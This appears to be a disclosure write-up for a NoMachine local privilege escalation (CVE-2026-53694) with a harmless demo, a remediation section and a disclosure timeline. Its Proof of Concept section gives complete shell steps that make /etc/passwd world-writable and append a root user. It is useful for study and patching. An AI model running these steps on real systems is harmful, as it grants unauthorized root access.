## https://sploitus.com/exploit?id=8596479B-1EDC-5D58-82E1-664368340586
# CVE-2026-53694: NoMachine Local Privilege Escalation via Argument Injection

## Overview
This repository contains the write-up and Proof of Concept (PoC) for CVE-2026-53694, a Local Privilege Escalation (LPE) vulnerability in NoMachine for Linux.
The `nxchmod.sh` script expands the path of each file it processes without quoting, so a file name containing whitespace is word-split into several arguments of a `chmod` command executed as `root`. By combining this argument injection with a symbolic link placed inside an attacker-owned directory, a local unprivileged user can make critical system files (such as `/etc/passwd`) world-writable and escalate privileges to root.
This vulnerability has been fully patched by the vendor.
## The Discovery Process
Finding this vulnerability was a process of trial, error, and a late-night realization. Here is how the discovery unfolded:
1. **Observing the Target:** I noticed that the `/usr/NX/scripts/restricted/nxchmod.sh` script was being executed periodically by the root user to manage permissions in specific directories.
2. **Initial Idea (The Dead End):** I saw that the script was applying `chmod a+rw` to files. I thought: *If I control the destination, can I use a symlink to make `/etc/passwd` writable?* I tested a standard symlink (`ln -s /etc/passwd /tmp/asdf`), but it failed. With `fs.protected_symlinks` enabled (the default on current distributions), the kernel refuses to follow a symlink located in a world-writable sticky directory such as `/tmp` unless the follower's UID matches the symlink's owner or the directory's owner, so root cannot be tricked into following a symlink I created there.
3. **The Breakthrough:** While reviewing the script execution later, I noticed how the command was being constructed: `${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}`. The script was taking the literal file name and passing it directly to `chmod`.
4. **Argument Injection via Filename:** I realized I could create a file with spaces and flags in its name. I created a file named `X1234 -R -L`. When the script ran, the shell split the unquoted name on whitespace, so `chmod` received `-R` and `-L` as options rather than as part of a single file path.
5. **Bypassing the Sticky-Directory Symlink Restriction:** By injecting the `-R` (recursive) and `-L` (follow symlinks during traversal) flags into the `chmod` command via the file name, I made `chmod` descend into the `X1234` directory and follow the symlink inside it. That symlink lives in a directory I own rather than directly in the sticky, world-writable `/tmp/.X11-unix`, so the `protected_symlinks` check does not apply to it.
6. **Achieving LPE:** Once `/etc/passwd` was world-writable (`a+rw`), I could append a new UID 0 user with a known password hash to the file and `su` into it.
## Technical Analysis
The vulnerability stems from how NoMachine handles permissions for X11/Wayland sockets. The script `nxchmod.sh` is spawned by the `nxserver.bin` daemon running as root.
The vulnerable execution looks like this:
```bash
# /usr/NX/scripts/restricted/nxchmod.sh
${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}
```
If an attacker creates a directory `X1234` and, beside it, an empty file named `X1234 -R -L`, the shell word-splits the unquoted `${FILE_PATH}` when the script processes that file, and the command executed by root becomes:
`/bin/chmod a+rw /tmp/.X11-unix/X1234 -R -L`
GNU `chmod` permutes its argument list, so options placed after the operand are still honoured, and the first token now names the attacker-created directory `X1234` rather than the crafted file. With a symlink to `/etc/passwd` placed inside that directory, the injected `-R` and `-L` make `chmod` traverse into `X1234`, follow the link, and grant global read/write permissions to `/etc/passwd`. Two details make this work: the symlink sits in an attacker-owned, non-sticky directory, so the kernel's `protected_symlinks` restriction does not apply to it; and the installed `chmod` must accept `-L` as a traversal option, which GNU coreutils added to `chmod` only recently (an older build rejects the injected flag as an invalid option instead of changing anything).
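The word splitting described above can be reproduced without root, NoMachine or any change to `/etc/passwd`. The following is an added example, not code from the repository or from NoMachine's script: a stub `chmod` records the argv it receives, so the effect of the unquoted `${FILE_PATH}` expansion (and of the quoted, `--`-terminated form that fixes it) is visible directly. The temporary directory layout and the `vulnerable_argv` / `hardened_argv` function names are assumptions made for the demo.

```sh
#!/bin/sh
# Added example, not NoMachine's code: reproduce the word splitting behind the
# injection in a scratch directory, as an ordinary user, with a stub chmod that
# records its argv instead of changing permissions.
set -u

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
mkdir -p "$WORK/bin" "$WORK/sock"

# Stub chmod (constructed for the demo): one argv entry per output line.
cat > "$WORK/bin/chmod" <<'EOF'
#!/bin/sh
for arg in "$@"; do printf '%s\n' "$arg"; done
EOF
chmod +x "$WORK/bin/chmod"

# Attacker-controlled entries mirroring the PoC: a file whose name carries
# chmod flags, and a real directory matching the first token of that name.
CRAFTED="$WORK/sock/X1234 -R -L"
touch "$CRAFTED"
mkdir "$WORK/sock/X1234"

COMMAND_CHMOD="$WORK/bin/chmod"
MOD_STRING="a+rw"

# Vulnerable pattern: the nxchmod.sh line quoted on the page, all expansions
# unquoted. The shell splits ${FILE_PATH} on whitespace, so " -R -L" become
# separate arguments and chmod's operand is the X1234 directory.
vulnerable_argv() {
    FILE_PATH="$1"
    ${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}
}

# Hardened pattern: quote every expansion and end option parsing with "--",
# so the whole name, flags included, reaches chmod as a single operand.
hardened_argv() {
    FILE_PATH="$1"
    "${COMMAND_CHMOD}" "${MOD_STRING}" -- "${FILE_PATH}"
}

# Number of argv entries a pattern hands to chmod for the crafted name.
count_args() {
    "$1" "$CRAFTED" | wc -l | tr -d ' '
}

# The path chmod actually operates on under the vulnerable pattern.
vulnerable_operand() {
    vulnerable_argv "$CRAFTED" | sed -n '2p'
}

# Does the crafted name reach chmod intact as one argument?
name_intact() {
    "$1" "$CRAFTED" | grep -qxF -- "$CRAFTED"
}

echo "vulnerable: $(count_args vulnerable_argv) args"   # 4: a+rw, .../X1234, -R, -L
vulnerable_argv "$CRAFTED" | sed 's/^/  /'
echo "hardened:   $(count_args hardened_argv) args"     # 3: a+rw, --, the full name
hardened_argv "$CRAFTED" | sed 's/^/  /'
[ -d "$(vulnerable_operand)" ] && echo "vulnerable operand is the attacker's directory"
```

The operand check is the part worth noticing: under the vulnerable pattern the path `chmod` receives is the attacker's `X1234` directory, which is exactly why the PoC creates both the crafted file and a directory of the same base name. Quoting alone stops the splitting; the `--` additionally keeps a file name that begins with `-` from being read as an option.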
## Requirements for Exploitation
For this exploit to work, the target system must meet the following conditions:
* The OS must be using Wayland (not X11).
* Xwayland must be active.
* A graphical session must be running (the login screen is sufficient).
## Proof of Concept
You can reproduce this vulnerability either manually using shell commands or automatically using the provided Python script.
### Method 1: Manual Execution (Shell)
Navigate to `/tmp/.X11-unix/` and execute the following commands to create the malicious directory structure.
```bash
cd /tmp/.X11-unix/
# 1. Exploitation setup
# A file whose name carries the flags nxchmod.sh will pass, unquoted, to chmod...
touch "X1234 -R -L"
# ...and a real directory matching the first token of that name: after word
# splitting it becomes chmod's operand.
mkdir X1234
# The symlink lives inside the attacker-owned directory, not directly in the
# sticky /tmp/.X11-unix, so protected_symlinks does not stop root from following it.
ln -s /etc/passwd /tmp/.X11-unix/X1234/pwn
# Wait for nxchmod.sh to execute (can take up to 60 seconds); -w becomes true
# for an unprivileged user once /etc/passwd is -rw-rw-rw-.
until [ -w /etc/passwd ]; do sleep 5; done
ls -l /etc/passwd
# Append a UID 0 user (here "gg", as in poc.py) with a locally generated hash, then switch to it.
echo "gg:$(openssl passwd -6 'gg'):0:0:gg:/root:/bin/bash" >> /etc/passwd
su gg
```
Once you have verified the vulnerability and escalated privileges, run the following cleanup commands (as root) to restore the original permissions and remove the artifacts:
```bash
# 2. Cleanup
rm "X1234 -R -L"
unlink X1234/pwn
rmdir X1234
chmod 644 /etc/passwd
# Remove the user you appended to /etc/passwd (the automated PoC names it gg).
sed -i '/^gg:/d' /etc/passwd
```
### Method 2: Automated Exploit
A full automated exploit is provided in `poc.py`. This script verifies the Wayland requirements, sets up the crafted file and symlink, waits for the `nxchmod.sh` execution cycle, and injects a new root user (`gg`) into `/etc/passwd`.
To run the exploit:
```bash
python3 poc.py
```
## Remediation
This vulnerability has been addressed by NoMachine. Users should update to the following versions or later:
* NoMachine 9.5.7
* NoMachine 8.23.2
## Timeline
* **2026-04-20:** Vulnerability reported to vendor.
* **2026-04-23:** Vendor confirmed the vulnerability and agreed to coordinated disclosure.
* **2026-05-07:** Vendor released patched versions (9.5.7 and 8.23.2) and published Trouble Report TR04X11802.
* **2026-06-10:** CVE-2026-53694 published to NVD. The official MITRE record is still pending full analysis and credit updates (last checked 2026-07-01).
## References
* [NoMachine Trouble Report TR04X11802](https://kb.nomachine.com/TR04X11802)
* [NoMachine Software Update SU05X00274](https://kb.nomachine.com/SU05X00274)
* [NoMachine Software Update SU05X00275](https://kb.nomachine.com/SU05X00275)
* [NVD - CVE-2026-53694](https://nvd.nist.gov/vuln/detail/CVE-2026-53694)